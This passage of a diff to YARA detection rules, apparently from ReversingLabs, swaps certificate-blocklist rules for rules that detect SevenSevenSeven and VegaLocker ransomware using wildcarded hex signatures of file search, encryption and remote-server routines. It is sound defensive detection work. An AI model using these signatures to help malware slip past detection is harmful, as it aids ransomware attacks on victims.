+            ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C3 8B 4D ??
+            5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+		$encrypt_files = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 50 53 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 50 8D 45
+            ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4B ?? 51
+            FF 15 ?? ?? ?? ?? 83 E0 ?? 74 ?? 8B 53 ?? 52 FF 15 ?? ?? ?? ?? 83 E0 ?? 50 8B 43 ??
+            50 FF 15 ?? ?? ?? ?? 8B 4B ?? 51 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 53
+            ?? 52 8D 45 ?? 50 83 EC ?? 8B CC 89 A5 ?? ?? ?? ?? 51 8B 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? C6 45 ?? ?? 8D 55 ?? 52 8B 43 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45
+            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 43 ?? 50 8D
+            4D ?? 51 83 EC ?? 8B D4 89 A5 ?? ?? ?? ?? 52 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B 43 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ??
+            C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ??
+            33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3 5B C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Instamix Limited" and ( pe.signatures [ i ] . serial == "00:a7:98:9f:8b:e0:c8:2d:35:a1:9e:7b:3d:d4:be:30:e5" or pe.signatures [ i ] . serial == "a7:98:9f:8b:e0:c8:2d:35:a1:9e:7b:3d:d4:be:30:e5" ) and 1598054400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( ( $exclude_directories_and_drop_ransom_note ) or ( $drop_ransom_note_no_dir_exclusion ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0Fa13Ae98E17Ae23Fcfe7Ae873D0C120 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Sevensevenseven : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects SevenSevenSeven ransomware."
 		author = "ReversingLabs"
-		id = "87a47456-4d90-5a7d-af9d-7a6d5fb8efac"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "049531bd-9505-5da1-9512-980383c8c5ec"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5310-L5326"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "415f39f82b6a45acd196ccf246ec660806a8d66c61df8c7d2850e5b244118d04"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.SevenSevenSeven.yara#L1-L148"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "583a8ac746cd749bd3927f10c864a3ac84f82f8bbd8d0ebf117e22b016d7ca94"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "SevenSevenSeven"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$file_search_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ??
+            ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 45 ?? 53 56 57 89 65 ?? BE ?? ?? ?? ?? 89 75
+            ?? 33 DB 89 5D ?? 88 5D ?? 89 75 ?? 89 5D ?? 88 5D ?? 89 75 ?? 88 5D ?? 68 ?? ?? ??
+            ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 53 50 8D 4D ?? E8
+            ?? ?? ?? ?? BF ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ??
+            ?? 83 C4 ?? 39 7D ?? 8B 45 ?? 73 ?? 8D 45 ?? 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? EB ?? BE ?? ?? ?? ?? 90 6A ?? 53 8D
+            4D ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 8D 8D ?? ?? ??
+            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ??
+            53 50 8D 4D ?? E8 ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 89 B5 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? 39 BD ?? ?? ??
+            ?? 72 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 B5 ?? ?? ?? ?? 89 9D ?? ??
+            ?? ?? 88 9D ?? ?? ?? ?? 39 7D ?? 8B 75 ?? 73 ?? 8D 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ??
+            ?? ?? ?? 85 C0 74 ?? B8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0
+        }
+		$file_search_p2 = {
+            74 ?? B8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 3B
+            C3 0F 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74
+            ?? 8B 45 ?? 3A C3 0F 84 ?? ?? ?? ?? 50 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 3B
+            F3 0F 84 ?? ?? ?? ?? 39 7D ?? 72 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 7D ?? 72
+            ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? 88 5D ?? 39 7D
+            ?? 0F 82 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 E9 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 38 1E 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ??
+            ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 89 5D ??
+            39 7D ?? 8B 45 ?? 73 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? EB
+            ?? B8 ?? ?? ?? ?? C3
+        }
+		$encrypt_file_1 = {
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 55 8B AC 24 ?? ?? ?? ?? 56 55 89 84 24 ?? ?? ?? ??
+            33 F6 FF 15 ?? ?? ?? ?? 33 C9 85 C0 76 ?? 8D 9B ?? ?? ?? ?? 80 3C 29 ?? 75 ?? 46 41
+            3B C8 72 ?? 83 FE ?? 75 ?? 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ??
+            ?? ?? ?? C3 57 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8B
+            F8 83 FF ?? 75 ?? 5F 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ??
+            ?? C3 53 6A ?? 57 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 73 ?? 57 FF 15 ?? ?? ?? ?? 5B 5F
+            5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 53 6A ?? FF 15
+            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 57 8B F0 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 53 56
+            57 FF 15 ?? ?? ?? ?? 33 C0 85 DB 76 ?? 8D 49 ?? 80 34 30 ?? 40 3B C3 72 ?? 6A ?? 6A
+            ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 53 56 57 FF 15 ?? ?? ?? ?? 57 FF
+            15 ?? ?? ?? ?? 8D 54 24 ?? 52 FF 15 ?? ?? ?? ?? 0F B7 44 24 ?? 0F B7 4C 24 ?? 0F B7
+            54 24 ?? 68 ?? ?? ?? ?? 50 0F B7 44 24 ?? 51 0F B7 4C 24 ?? 52 0F B7 54 24 ?? 50 51
+            52 55 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 55 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B
+            8C 24 ?? ?? ?? ?? 5B 5F 5E B8 ?? ?? ?? ?? 5D E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$encrypt_file_2 = {
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 55 8B AC 24 ?? ?? ?? ?? 56 55 89 84 24 ?? ?? ?? ??
+            33 F6 FF 15 ?? ?? ?? ?? 33 C9 85 C0 76 ?? 8D 9B ?? ?? ?? ?? 80 3C 29 ?? 75 ?? 46 41
+            3B C8 72 ?? 83 FE ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 55 FF 15 ??
+            ?? ?? ?? 8B F0 83 FE ?? 75 ?? 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4
+            ?? ?? ?? ?? C3 53 6A ?? 56 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 73 ?? 56 FF 15 ?? ?? ??
+            ?? 5B 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 57 8D 83
+            ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 8B F8 FF 15 ?? ?? ?? ??
+            6A ?? 8D 4C 24 ?? 51 53 57 56 FF 15 ?? ?? ?? ?? 8B CB C1 E9 ?? 41 74 ?? 8D 47 ?? B2
+            ?? 80 70 ?? ?? 80 70 ?? ?? 80 30 ?? 80 70 ?? ?? 80 70 ?? ?? 80 70 ?? ?? 80 70 ?? ??
+            30 50 ?? 83 C0 ?? 49 75 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 54 24 ??
+            52 53 57 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ??
+            0F B7 4C 24 ?? 0F B7 54 24 ?? 0F B7 44 24 ?? 68 ?? ?? ?? ?? 51 0F B7 4C 24 ?? 52 0F
+            B7 54 24 ?? 50 0F B7 44 24 ?? 51 52 50 55 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 FF 15 ?? ??
+            ?? ?? 8D 54 24 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 55 FF 15
+            ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5B 5E B8 ?? ?? ?? ?? 5D E8
+            ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$remote_server_1 = {
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 55 56 57 68 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 33 FF 57 6A ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 89 44 24 ?? 33 DB
+            BD ?? ?? ?? ?? 8B 44 24 ?? BA ?? ?? ?? ?? 8B CB D3 E2 85 D0 0F 84 ?? ?? ?? ?? 8A CB
+            8D 54 24 ?? 80 C1 ?? 52 88 4C 24 ?? 66 C7 44 24 ?? ?? ?? FF D6 83 F8 ?? 74 ?? 8D 44
+            24 ?? 50 FF D6 83 F8 ?? 75 ?? 8D 44 24 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 8D
+            50 ?? 8A 08 40 84 C9 75 ?? 2B C2 50 8D 4C 24 ?? 51 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 54
+            24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 83 F8 ?? 72 ?? 8B 44 24 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 43 83 FB ?? 0F 8C ?? ??
+            ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ??
+            ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 33 C0 5B E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2
+        }
+		$remote_server_2 = {
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 57 33 FF 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 89 84
+            24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 66 83 7C 24 ?? ??
+            0F 85 ?? ?? ?? ?? 66 83 7C 24 ?? ?? 0F 87 ?? ?? ?? ?? 53 55 56 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ??
+            8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 89 44 24 ?? 33 DB BD ?? ??
+            ?? ?? 8B CB B8 ?? ?? ?? ?? D3 E0 8B 4C 24 ?? 85 C1 0F 84 ?? ?? ?? ?? 8A D3 8D 44 24
+            ?? 80 C2 ?? 50 88 54 24 ?? 66 C7 44 24 ?? ?? ?? FF D6 83 F8 ?? 74 ?? 8D 4C 24 ?? 51
+            FF D6 83 F8 ?? 75 ?? 8D 44 24 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 8D 50 ?? 8A
+            08 40 84 C9 75 ?? 2B C2 50 8D 54 24 ?? 52 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 6A
+            ?? 50 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 83 F8 ?? 72 ?? 8B 4C 24 ?? 51 E8 ?? ?? ??
+            ?? 83 C4 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 43 83 FB ?? 0F 8C ?? ?? ?? ?? E8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B
+            8C 24 ?? ?? ?? ?? 5E 5D 5B 33 C0 5F E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2 ?? ?? 57 FF
+            15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KLAKSON, LLC" and pe.signatures [ i ] . serial == "0f:a1:3a:e9:8e:17:ae:23:fc:fe:7a:e8:73:d0:c1:20" and 1597276801 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $file_search_p* ) ) and ( ( ( $encrypt_file_1 ) and ( $remote_server_1 ) ) or ( ( $encrypt_file_2 ) and ( $remote_server_2 ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3696883055975D571199C6B5D48F3Cd5 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Vegalocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects VegaLocker ransomware."
 		author = "ReversingLabs"
-		id = "f68338f9-8614-5793-981d-70547dbc65ce"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "53eec8d1-bab0-5556-92c0-1b70eb763fa5"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5328-L5344"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d6f77b9ca928167341a35b83e353886d4db8dfcecf45cde0f0f93d65059b5200"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.VegaLocker.yara#L1-L100"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8616e72fc435676179e83a304d4111c8f29ebf3cd79ff5b2d229cca8fc97c2a3"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "VegaLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 89 55 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ??
+            ?? 89 C3 85 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 FF D3 85 C0 74
+            ?? 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45
+            ?? 80 38 ?? 75 ?? 8B 45 ?? 80 78 ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? E8 ?? ??
+            ?? ?? 8B F0 80 3E ?? 0F 84 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F0 80 3E ?? 0F 84
+            ?? ?? ?? ?? EB ?? 8B 75 ?? 83 C6 ?? 8B DE 2B 5D ?? 8D 43 ?? 50 8B 45 ?? 50 8D 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F8 8B C7 2B C6
+            03 C3 40 3D ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 8B C7 2B C6 40 50 56 8D 85 ?? ?? ?? ?? 03
+            C3 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 89 45
+            ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            8D 53 ?? 03 C2 40 3D ?? ?? ?? ?? 7F ?? C6 84 1D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C3
+            48 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 03 C3 40 50 E8 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 40 03 D8 8B F7 80 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 8D 85
+            ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D
+            ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8D 45 ?? E8 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64
+            FF 30 64 89 20 C6 85 ?? ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85
+            ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 E9 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 55 68
+            ?? ?? ?? ?? 64 FF 30 64 89 20 6A ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89
+            45 ?? 8B 45 ?? 8B 10 FF 12 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
+            33 D2 8B 45 ?? 8B 08 FF 51 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B
+            45 ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C6
+            85 ?? ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59
+            64 89 10 EB ?? E9 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30
+        }
+		$encrypt_files_p2 = {
+            64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 8B 4D ?? B2 ??
+            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 12 89 85 ?? ?? ?? ?? 89 95
+            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 83 BD ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? EB ??
+            0F 8E ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 76 ?? EB
+            ?? 7E ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
+            ?? 8D 45 ?? E8 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 83 FB ?? 7F ??
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ??
+            ?? 8D 45 ?? E8 ?? ?? ?? ?? 43 83 FB ?? 75 ?? 8B 85 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ??
+            ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 8B 8D ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 83
+            BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? BA
+        }
+		$encrypt_files_p3 = {
+            E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
+            EB ?? 8D 45 ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 33 D2 8B 45 ?? 8B
+            08 FF 51 ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ??
+            E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 59 55 E8 ?? ??
+            ?? ?? 59 EB ?? 55 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ??
